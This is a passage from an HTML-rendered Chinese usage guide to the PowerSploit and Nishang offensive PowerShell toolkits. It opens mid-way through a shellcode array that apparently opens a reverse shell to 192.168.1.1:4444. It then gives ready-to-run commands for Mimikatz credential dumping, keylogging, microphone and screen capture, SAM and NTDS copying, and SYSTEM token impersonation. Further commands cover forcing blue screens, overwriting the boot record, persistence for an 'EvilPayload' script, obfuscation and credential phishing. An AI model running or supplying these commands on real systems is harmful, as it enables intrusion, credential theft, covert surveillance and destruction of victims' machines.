class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x66,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x4b,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x1c,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd0,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>x44,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x12,<span class="hljs-number">0</span>xeb,<span class="hljs-number">0</span>x8d,<span class="hljs-number">0</span>x5d,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x33,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x73,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x7,<span class="hljs-number">0</span>xff,<span 
class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>xb8,<span class="hljs-number">0</span>x90,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc4,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>x80,<span class="hljs-number">0</span>x6b,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x5,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>xa8,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x5c,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe6,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xea,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xdf,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x97,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span 
class="hljs-number">0</span>x99,<span class="hljs-number">0</span>xa5,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x85,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>xa,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x4e,<span class="hljs-number">0</span>x8,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xec,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7e,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x58,<span 
class="hljs-number">0</span>xa4,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x93,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x22,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xb,<span class="hljs-number">0</span>x2f,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>x6e,<span class="hljs-number">0</span>x4d,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xc,<span 
class="hljs-number">0</span>x24,<span class="hljs-number">0</span>xe9,<span class="hljs-number">0</span>x71,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc6,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>xbb,<span class="hljs-number">0</span>xf0,<span class="hljs-number">0</span>xb5,<span class="hljs-number">0</span>xa2,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5) -Force
</code></pre>
<h4 id="invoke-wmicommand">Invoke-WmiCommand</h4>
<p>&#x5728;&#x76EE;&#x6807;&#x4E3B;&#x673A;&#x4F7F;&#x7528;wmi&#x6267;&#x884C;&#x547D;&#x4EE4;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"><span class="hljs-variable">$username</span> = <span class="hljs-string">&quot;test\Administrator&quot;</span>
<span class="hljs-variable">$password</span> = echo <span class="hljs-string">&quot;123456&quot;</span> | <span class="hljs-built_in">ConvertTo-SecureString</span> -AsPlainText -Force
<span class="hljs-variable">$c</span> = <span class="hljs-built_in">New-Object</span> System.Management.Automation.PSCredential <span class="hljs-variable">$username</span>,<span class="hljs-variable">$password</span>

Invoke-Wmicommand -Payload { <span class="hljs-number">1</span> + <span class="hljs-number">1</span> } -ComputerName <span class="hljs-string">&apos;192.168.1.1&apos;</span> -Credential <span class="hljs-variable">$Credentials</span>
</code></pre>
<h3 id="exfiltration">Exfiltration</h3>
<h4 id="get-gppautologon">Get-GPPAutologon</h4>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-GPPAutologon
</code></pre>
<h4 id="get-gpppassword">Get-GPPPassword</h4>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-GPPPassword
</code></pre>
<h4 id="get-keystrokes">Get-Keystrokes</h4>
<p>&#x952E;&#x76D8;&#x8BB0;&#x5F55;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-Keystrokes -LogPath .\<span class="hljs-number">1</span>.txt
</code></pre>
<h4 id="get-microphoneaudio">Get-MicrophoneAudio</h4>
<p><strong>&#x901A;&#x8FC7;&#x9EA6;&#x514B;&#x98CE;&#x8BB0;&#x5F55;&#x58F0;&#x97F3;</strong></p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-MicrophoneAudio -Path .\<span class="hljs-number">1</span>.wav -Length <span class="hljs-number">10</span>
</code></pre>
<h4 id="get-timedscreenshot">Get-TimedScreenshot</h4>
<p><strong>&#x5C4F;&#x5E55;&#x8BB0;&#x5F55;</strong></p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-TimedScreenshot -Path .\screenshot\ -Interval <span class="hljs-number">10</span> -EndTime <span class="hljs-number">18</span>:<span class="hljs-number">00</span>
</code></pre>
<h4 id="get-vaultcredential">Get-VaultCredential</h4>
<p><strong>&#x4ECE;&#x51ED;&#x8BC1;&#x7BA1;&#x7406;&#x5668;&#x4E2D;&#x83B7;&#x53D6;&#x51ED;&#x8BC1;</strong></p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-VaultCredential
</code></pre>
<h4 id="invoke-credentialinjection">Invoke-CredentialInjection</h4>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="https://clymb3r.wordpress.com/2013/11/17/injecting-logon-credentials-with-powershell/" target="_blank">https://clymb3r.wordpress.com/2013/11/17/injecting-logon-credentials-with-powershell/</a></p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-CredentialInjection -UserName test -Password <span class="hljs-number">123456</span> -NewWinLogon
</code></pre>
<h4 id="invoke-mimikatz">Invoke-Mimikatz</h4>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-Mimikatz -DumpCreds
</code></pre>
<p>&#x6267;&#x884C;mimikatz&#x547D;&#x4EE4;</p>
<pre><code class="lang-powershell">invoke-mimikatz -Command <span class="hljs-string">&quot;Privilege::Debug Sekurlsa::logonpasswords&quot;</span>
</code></pre>
<h4 id="invoke-ninjacopy">Invoke-NinjaCopy</h4>
<p>&#x67D0;&#x4E9B;&#x6587;&#x4EF6;&#x88AB;&#x5176;&#x4ED6;&#x8FDB;&#x7A0B;&#x5360;&#x7528;&#x5BFC;&#x81F4;&#x4E0D;&#x80FD;&#x590D;&#x5236;&#x65F6;&#xFF0C;&#x53EF;&#x4EE5;&#x5C1D;&#x8BD5;&#x7528;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x6765;&#x590D;&#x5236;&#xFF08;&#x4F8B;&#x5982;&#x60F3;dump SAM&#x6587;&#x4EF6;&#xFF09;&#xFF0C;
&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\SAM.hive
</code></pre>
<h4 id="invoke-tokenmanipulation">Invoke-TokenManipulation</h4>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/" target="_blank">https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/</a></p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x679A;&#x4E3E;&#x552F;&#x4E00;&#x53EF;&#x7528;&#x7684;&#x4EE4;&#x724C;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -Enumerate
</code></pre>
<p><strong>&#x679A;&#x4E3E;&#x6240;&#x6709;&#x7684;&#x4EE4;&#x724C;&#xFF08;&#x5305;&#x62EC;&#x4E0D;&#x552F;&#x4E00;&#x7684;&#x4E0E;&#x901A;&#x8FC7;&#x7F51;&#x7EDC;&#x767B;&#x9646;&#x6240;&#x521B;&#x5EFA;&#x7684;&#x4EE4;&#x724C;&#xFF09;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -ShowAll
</code></pre>
<p><strong>&#x4F7F;&#x7528;SYSTEM&#x7528;&#x6237;&#x7684;&#x4EE4;&#x724C;&#x521B;&#x5EFA;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -CreateProcess <span class="hljs-string">&quot;calc.exe&quot;</span> -Username <span class="hljs-string">&quot;NT AUTHORITY\SYSTEM&quot;</span>
</code></pre>
<p>&#x8FD9;&#x91CC;&#x4E5F;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;ID&#x6765;&#x6307;&#x5B9A;&#x4E00;&#x4E2A;Token</p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -CreateProcess <span class="hljs-string">&quot;calc.exe&quot;</span> -ProcessId <span class="hljs-string">&quot;1234&quot;</span>
</code></pre>
<p>&#x90A3;&#x4E48;&#x8FD9;&#x91CC;&#x4F1A;&#x4F7F;&#x7528;&#x8FDB;&#x7A0B;ID1234&#x7684;&#x4F1A;&#x8BDD;&#x6765;&#x542F;&#x52A8;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;</p>
<p><strong>&#x4F7F;&#x5F53;&#x524D;&#x7684;&#x7EBF;&#x7A0B;&#x4EE4;&#x724C;&#x6A21;&#x4EFF;SYSTEM&#x7528;&#x6237;</strong></p>
<pre><code class="lang-powershell">Invoke-TokenManipulation -ImpersonateUser -Username <span class="hljs-string">&quot;nt authority\system&quot;</span>
</code></pre>
<h4 id="out-minidump">Out-Minidump</h4>
<p>dump&#x6307;&#x5B9A;&#x8FDB;&#x7A0B;&#x5B8C;&#x6574;&#x7684;&#x5185;&#x5B58;&#x955C;&#x50CF;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Out-Minidump -Process (<span class="hljs-built_in">Get-Process</span> -Id <span class="hljs-number">2612</span>) -DumpFilePath .\
</code></pre>
<h4 id="volumeshadowcopytools">VolumeShadowCopyTools</h4>
<p>&#x5377;&#x5F71;&#x62F7;&#x8D1D;&#x5DE5;&#x5177;</p>
<h5 id="get-volumeshadowcopy">Get-VolumeShadowCopy</h5>
<p>&#x5217;&#x51FA;&#x6240;&#x6709;&#x5377;&#x5F71;&#x62F7;&#x8D1D;&#x7684;&#x8DEF;&#x5F84;&#xFF0C;
&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-VolumeShadowCopy
</code></pre>
<h5 id="new-volumeshadowcopy">New-VolumeShadowCopy</h5>
<p>&#x65B0;&#x5EFA;&#x5377;&#x5F71;&#x62F7;&#x8D1D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">New-VolumeShadowCopy -Volume C:\
</code></pre>
<h5 id="mount-volumeshadowcopy">Mount-VolumeShadowCopy</h5>
<p>&#x6302;&#x8F7D;&#x5377;&#x5F71;&#x62F7;&#x8D1D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Mount-VolumeShadowCopy -Path C:\Users\haha -DevicePath \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
</code></pre>
<h5 id="remove-volumeshadowcopy">Remove-VolumeShadowCopy</h5>
<p>&#x5220;&#x9664;&#x5377;&#x5F71;&#x62F7;&#x8D1D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Remove-VolumeShadowCopy -DevicePath \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
</code></pre>
<h3 id="mayhem">Mayhem</h3>
<p>&#x5C06;&#x6B64;&#x6A21;&#x5757;&#x653E;&#x5728;<code>%Systemroot%/System32\WindowsPowerShell\v1.0\Modules</code>
&#x6216;
<code>$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules</code></p>
<h4 id="set-criticalprocess">Set-CriticalProcess</h4>
<p>&#x9000;&#x51FA;powershell&#x65F6;&#x4F7F;&#x7CFB;&#x7EDF;&#x84DD;&#x5C4F;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Set-CriticalProcess
</code></pre>
<p>&#x7ACB;&#x523B;&#x9000;&#x51FA;</p>
<pre><code class="lang-powershell">Set-CriticalProcess -ExitImmediately
</code></pre>
<h4 id="set-masterbootrecord">Set-MasterBootRecord</h4>
<p>&#x8986;&#x5199;&#x4E3B;&#x5F15;&#x5BFC;&#x8BB0;&#x5F55;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Set-MasterBootRecord -BootMessage <span class="hljs-string">&quot;test&quot;</span>
</code></pre>
<h3 id="persistence">Persistence</h3>
<p>&#x540C;mayhem&#x653E;&#x7F6E;&#x4F4D;&#x7F6E;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"><span class="hljs-variable">$ElevatedOptions</span> = New-ElevatedPersistenceOption  -PermanentWMI -Daily -At <span class="hljs-string">&apos;3 PM&apos;</span>
<span class="hljs-variable">$UserOptions</span> = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption <span class="hljs-variable">$ElevatedOptions</span> -UserPersistenceOption <span class="hljs-variable">$UserOptions</span>
</code></pre>
<h3 id="privesc">Privesc</h3>
<h4 id="get-system">Get-System</h4>
<p>&#x9700;&#x8981;&#x8FD0;&#x884C;&#x5728;STA&#x6A21;&#x5F0F;&#x4E0B;&#xFF0C;&#x542F;&#x52A8;&#x53C2;&#x6570;-STA</p>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/" target="_blank">http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/</a></p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">get-system
</code></pre>
<p><strong>&#x9009;&#x62E9;&#x65B9;&#x5F0F;</strong></p>
<pre><code class="lang-powershell">get-system -Technique namedpipe/token
</code></pre>
<p><strong>&#x6062;&#x590D;&#x4EE4;&#x724C;</strong></p>
<pre><code class="lang-powershell">Get-System -RevToSelf
</code></pre>
<h4 id="powerup">PowerUp</h4>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/" target="_blank">http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/</a>
<a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc" target="_blank">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc</a></p>
</blockquote>
<h3 id="recon">Recon</h3>
<h4 id="get-computerdetails">Get-ComputerDetails</h4>
<p>&#x83B7;&#x53D6;&#x8BA1;&#x7B97;&#x673A;&#x4FE1;&#x606F;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-ComputerDetails
</code></pre>
<h4 id="get-httpstatus">Get-HttpStatus</h4>
<p>&#x76EE;&#x5F55;&#x626B;&#x63CF;&#x811A;&#x672C;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Get-HttpStatus -Target www.example.com -Path C:\dic.txt -UseSSL
</code></pre>
<h4 id="invoke-portscan">Invoke-Portscan</h4>
<p>&#x7AEF;&#x53E3;&#x626B;&#x63CF;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<p><strong>&#x626B;&#x63CF;192.168.1.1/24&#x7684;135,139,445&#x7AEF;&#x53E3;</strong></p>
<pre><code class="lang-powershell">Invoke-Portscan -Hosts <span class="hljs-number">192.168</span>.<span class="hljs-number">1</span>,<span class="hljs-number">1</span> -Ports <span class="hljs-string">&quot;135,139,445,1&quot;</span> -Threads <span class="hljs-number">50</span>
</code></pre>
<p><strong>&#x626B;&#x63CF;Top50&#x7684;&#x7AEF;&#x53E3;</strong></p>
<pre><code class="lang-powershell">Invoke-Portscan -Hosts <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span> -TopPorts <span class="hljs-number">50</span> -Threads <span class="hljs-number">50</span>
</code></pre>
<p><strong>&#x626B;&#x63CF;&#x524D;&#x4E0D;ping&#x76EE;&#x6807;&#x4E3B;&#x673A;</strong></p>
<pre><code class="lang-powershell">Invoke-Portscan -Hosts <span class="hljs-number">192.168</span>.<span class="hljs-number">169.168</span> -Ports <span class="hljs-number">445</span> -SkipDiscovery
</code></pre>
<h4 id="invoke-reversednslookup">Invoke-ReverseDnsLookup</h4>
<p>ip&#x53CD;&#x67E5;&#x4E3B;&#x673A;&#x540D;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"> Invoke-ReverseDnsLookup -IpRange <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span>-<span class="hljs-number">192.168</span>.<span class="hljs-number">1.254</span>
</code></pre>
<h4 id="powerview">PowerView</h4>
<p>&#x540C;mayhem&#x653E;&#x7F6E;&#x4F4D;&#x7F6E;</p>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/README.md" target="_blank">https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/README.md</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-1/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-1/</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-2/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-2/</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-3/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-3/</a>
<a href="http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-4/" target="_blank">http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-4/</a></p>
</blockquote>
<h3 id="scriptmodification">ScriptModification</h3>
<h4 id="out-compresseddll">Out-CompressedDll</h4>
<p>&#x5C06;dll&#x538B;&#x7F29;&#x5E76;base64&#x7F16;&#x7801;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Out-CompressedDll -FilePath test.dll
</code></pre>
<h4 id="out-encodedcommand">Out-EncodedCommand</h4>
<p>&#x5C06;&#x811A;&#x672C;&#x6216;&#x4EE3;&#x7801;&#x5757;&#x7F16;&#x7801;</p>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x811A;&#x672C;&#x5757;&#x7F16;&#x7801;</strong></p>
<pre><code class="lang-powershell"> Out-EncodedCommand -ScriptBlock {<span class="hljs-built_in">write-host</span> <span class="hljs-string">&apos;whoami&apos;</span>}
</code></pre>
<p><strong>&#x811A;&#x672C;&#x7F16;&#x7801;</strong></p>
<pre><code class="lang-powershell">Out-EncodedCommand -Path .\<span class="hljs-number">1</span>.ps1 -WindowStyle Hidden
</code></pre>
<h4 id="out-encryptedscript">Out-EncryptedScript</h4>
<p>&#x811A;&#x672C;&#x52A0;&#x5BC6;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell"> Out-EncryptedScript -ScriptPath .\<span class="hljs-number">1</span>.ps1 -Password fuck -Salt <span class="hljs-number">123</span> -FilePath .\encrypt.ps1
</code></pre>
<h4 id="remove-comments">Remove-Comments</h4>
<p>&#x5220;&#x9664;&#x6CE8;&#x91CA;&#x548C;&#x4E0D;&#x5FC5;&#x8981;&#x7684;&#x7A7A;&#x767D;&#x7B26;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Remove-Comments -Path .\<span class="hljs-number">1</span>.ps1
</code></pre>
<pre><code class="lang-powershell">Remove-Comments -ScriptBlock { whoami }
</code></pre>
<h2 id="nishang">Nishang</h2>
<p>&#x4E0B;&#x9762;Nishang&#x7684;&#x4ECB;&#x7ECD;&#xFF0C;&#x670B;&#x53CB;<a href="https://github.com/lwhv1ct0r/" target="_blank">V1ct0r</a>&#x5BF9;&#x4E8E;Nishang&#x7684;&#x603B;&#x7ED3;&#x4E0D;&#x9519;&#xFF0C;&#x8FD9;&#x91CC;&#x4E89;&#x53D6;&#x540C;&#x610F;&#x4E4B;&#x540E;&#x4E00;&#x8D77;&#x53D1;&#x7ED9;&#x5927;&#x5BB6;&#x67E5;&#x770B;&#x3002;</p>
<h3 id="0&#x4FE1;&#x606F;&#x641C;&#x96C6;">0.&#x4FE1;&#x606F;&#x641C;&#x96C6;</h3>
<h4 id="check-vm">Check-VM</h4>
<p>&#x4ECE;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x7684;&#x540D;&#x5B57;&#x5C31;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x6765;&#xFF0C;&#x5B83;&#x662F;&#x7528;&#x4E8E;&#x68C0;&#x6D4B;&#x5F53;&#x524D;&#x7684;&#x673A;&#x5668;&#x662F;&#x5426;&#x662F;&#x4E00;&#x53F0;&#x5DF2;&#x77E5;&#x7684;&#x865A;&#x62DF;&#x673A;&#x7684;&#x3002;&#x5B83;&#x901A;&#x8FC7;&#x68C0;&#x6D4B;&#x5DF2;&#x77E5;&#x7684;&#x4E00;&#x4E9B;&#x865A;&#x62DF;&#x673A;&#x7684;&#x6307;&#x7EB9;&#x4FE1;&#x606F;&#xFF08;&#x5982;&#xFF1A;Hyper-V, VMWare, Virtual PC, Virtual Box,Xen,QEMU&#xFF09;&#x6765;&#x8BC6;&#x522B;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Check-VM
</code></pre>
<p>&#x6D4B;&#x8BD5;</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/check-vm.jpg" alt="Check-VM"></p>
<h4 id="copy-vss">Copy-VSS</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x5229;&#x7528;Volume Shadow Copy &#x670D;&#x52A1;&#x6765;&#x590D;&#x5236;&#x51FA;SAM&#x6587;&#x4EF6;&#x3002;&#x5982;&#x679C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x8FD0;&#x884C;&#x5728;DC&#x673A;&#x4E0A;&#xFF0C;ntds.dit&#x548C;SYSTEM hive&#x4E5F;&#x80FD;&#x88AB;&#x62F7;&#x8D1D;&#x51FA;&#x6765;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Copy-VSS //&#x5C06;&#x4F1A;&#x76F4;&#x63A5;&#x628A;&#x6587;&#x4EF6;&#x4FDD;&#x5B58;&#x5728;&#x5F53;&#x524D;&#x8DEF;&#x5F84;&#x4E0B;
PS &gt; Copy-VSS -DestinationDir C:\temp  //&#x6307;&#x5B9A;&#x4FDD;&#x5B58;&#x6587;&#x4EF6;&#x7684;&#x8DEF;&#x5F84;&#xFF08;&#x5FC5;&#x987B;&#x662F;&#x5DF2;&#x7ECF;&#x5B58;&#x5728;&#x7684;&#x8DEF;&#x5F84;&#xFF09;
</code></pre>
<p>&#x6D4B;&#x8BD5;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/copy-vss.jpg" alt="Copy-VSS"></p>
<h4 id="invoke-credentialsphish">Invoke-CredentialsPhish</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x662F;&#x7528;&#x6765;&#x6B3A;&#x9A97;&#x7528;&#x6237;&#x8F93;&#x5165;&#x8D26;&#x53F7;&#x5BC6;&#x7801;&#x4FE1;&#x606F;&#x7684;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Invoke-CredentialsPhish
</code></pre>
<p>&#x6D4B;&#x8BD5;
